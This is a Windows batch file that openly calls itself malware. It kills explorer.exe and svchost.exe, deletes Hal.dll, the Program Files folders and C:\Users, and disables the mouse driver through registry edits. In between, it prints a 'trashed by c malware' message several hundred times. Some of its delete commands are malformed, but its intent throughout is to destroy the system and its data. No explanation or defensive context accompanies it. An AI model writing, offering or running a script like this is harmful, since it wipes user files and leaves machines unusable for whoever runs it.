@echo off
color 4
taskkill /f /im explorer.exe
del C:\Windows\System32\Hal.dll
del C:\Program Files (x86)
del C:\Program Files
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
reg add %key% /v Start /t REG_DWORD /d 4
del C:\Users
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
echo Your Computer has been trashed by c malware!
taskkill /f /im svchost.exe
